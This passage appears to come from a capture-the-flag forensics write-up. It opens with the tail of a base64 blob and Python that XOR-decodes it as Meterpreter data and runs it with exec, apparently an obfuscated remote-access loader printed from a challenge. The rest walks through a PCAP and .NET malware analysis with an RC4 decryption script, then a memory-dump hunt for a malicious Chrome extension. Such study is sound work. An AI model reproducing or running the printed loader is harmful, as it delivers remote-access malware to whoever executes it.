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")

meterpreter_data = bytes([data[i] ^ key[i % len(key)] for i in range(len(data))])

exec(__import__('zlib').decompress(meterpreter_data)[0])

Silent Trap [Forensics]

Question: A critical incident has occurred in Tales from Eldoria, trapping thousands of players in the virtual world with no way to log out. The cause has been traced back to Malakar, a mysterious entity that launched a sophisticated attack, taking control of the developers’ and system administrators’ computers. With key systems compromised, the game is unable to function properly, which is why players remain trapped in Eldoria. Now, you must investigate what happened and find a way to restore the system, freeing yourself from the game before it’s too late.

Flag: N/A

We are given a PCAP file to investigate and several questions to answer. Once all questions are answered, the challenge is considered solved.

silent1

Question 1: What is the subject of the first email that the victim opened and replied to?

The first email received from the malicious actor can be identified on HTTP stream 4.

silent2

Question 2: On what date and time was the suspicious email sent? (Format: YYYY-MM-DD_HH:MM) (for example: 1945-04-30_12:34)

The suspicious email with the malicious attachment can be identified on HTTP stream 8.

silent3

Question 3: What is the MD5 hash of the malware file?

The malicious attachment can be obtained via HTTP objects from the PCAP itself. The password to extract the malware file was already mentioned in the suspicious email.

silent4

silent5

1
2
└─$ md5sum Eldoria_Balance_Issue_Report.pdf.exe
c0b37994963cc0aadd6e78a256c51547  Eldoria_Balance_Issue_Report.pdf.exe

Question 4: What credentials were used to log into the attacker’s mailbox? (Format: username:password)

Since the malware file is a .NET executable, we can analyze it statically with dnSpy. The credentials can be identified in one of the main functions.

silent6

Question 5: What is the name of the task scheduled by the attacker?

Further analysis on the functions show that it tries to connect to a mail server and execute remote CMD commands which are encoded with XOR and base64.

silent7

silent8

silent10

Additionally, we can see that the XOR key is being encrypted with RC4 from another function. The RC4 seems to be using the value of pwd which indicates the password. Since we already have the username and password previously, we can easily decrypt the XOR key.

silent9

Hence, a Python script can be created to replicate the malicious functions and decrypt each CMD commands.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
import base64

KEY = [
    168, 115, 174, 213, 168, 222, 72, 36, 91, 209, 242, 128, 69, 99, 195, 164, 238, 182, 67, 92,
    7, 121, 164, 86, 121, 10, 93, 4, 140, 111, 248, 44, 30, 94, 48, 54, 45, 100, 184, 54,
    28, 82, 201, 188, 203, 150, 123, 163, 229, 138, 177, 51, 164, 232, 86, 154, 179, 143, 144, 22,
    134, 12, 40, 243, 55, 2, 73, 103, 99, 243, 236, 119, 9, 120, 247, 25, 132, 137, 67, 66,
    111, 240, 108, 86, 85, 63, 44, 49, 241, 6, 3, 170, 131, 150, 53, 49, 126, 72, 60, 36,
    144, 248, 55, 10, 241, 208, 163, 217, 49, 154, 206, 227, 25, 99, 18, 144, 134, 169, 237, 100,
    117, 22, 11, 150, 157, 230, 173, 38, 72, 99, 129, 30, 220, 112, 226, 56, 16, 114, 133, 22,
    96, 1, 90, 72, 162, 38, 143, 186, 35, 142, 128, 234, 196, 239, 134, 178, 205, 229, 121, 225,
    246, 232, 205, 236, 254, 152, 145, 98, 126, 29, 217, 74, 177, 142, 19, 190, 182, 151, 233, 157,
    76, 74, 104, 155, 79, 115, 5, 18, 204, 65, 254, 204, 118, 71, 92, 33, 58, 112, 206, 151,
    103, 179, 24, 164, 219, 98, 81, 6, 241, 100, 228, 190, 96, 140, 128, 1, 161, 246, 236, 25,
    62, 100, 87, 145, 185, 45, 61, 143, 52, 8, 227, 32, 233, 37, 183, 101, 89, 24, 125, 203,
    227, 9, 146, 156, 208, 206, 194, 134, 194, 23, 233, 100, 38, 158, 58, 159
]

def rc4_decrypt(key, data):
    S = list(range(256))
    j = 0
    
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]

    i = j = 0
    decrypted = bytearray()
    for byte in data:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        keystream = S[(S[i] + S[j]) % 256]
        decrypted.append(byte ^ keystream)

    return bytes(decrypted)

def xor_payload(encoded_data):
    encrypted_key = base64.b64decode(encoded_data)
    decrypted_key = rc4_decrypt(KEY, encrypted_key)
    return decrypted_key.decode("utf-8", errors="ignore")

payload = "<ENCRYPTED_PAYLOAD>"
decrypted = xor_payload(payload)
print("Decrypted text:", decrypted)

Decrypting each CMD commands manually, the scheduled task can be identified on TCP stream 35.

silent11

Question 6: What is the API key leaked from the highly valuable file discovered by the attacker?

Similarly, the leaked API key can be identified on TCP stream 97.

silent12

Stealth Invasion [Forensics]

Question: Selene’s normally secure laptop recently fell victim to a covert attack. Unbeknownst to her, a malicious Chrome extension was stealthily installed, masquerading as a useful productivity tool. Alarmed by unusual network activity, Selene is now racing against time to trace the intrusion, remove the malicious software, and bolster her digital defenses before more damage is done.

Flag: N/A

We are given a memory dump to investigate and several questions to answer. Once all questions are answered, the challenge is considered solved. PS: Volatility3 on WSL2 could not analyze the memory dump so I had to resort to a VM.

mem1

Question 1: What is the PID of the Original (First) Google Chrome process

mem2

Question 2: What is the only Folder on the Desktop

mem3

Question 3: What is the Extention’s ID (ex: hlkenndednhfkekhgcdicdfddnkalmdm)

Where does Chrome store extensions?

mem4

Question 4: After examining the malicious extention’s code, what is the log filename in which the datais stored

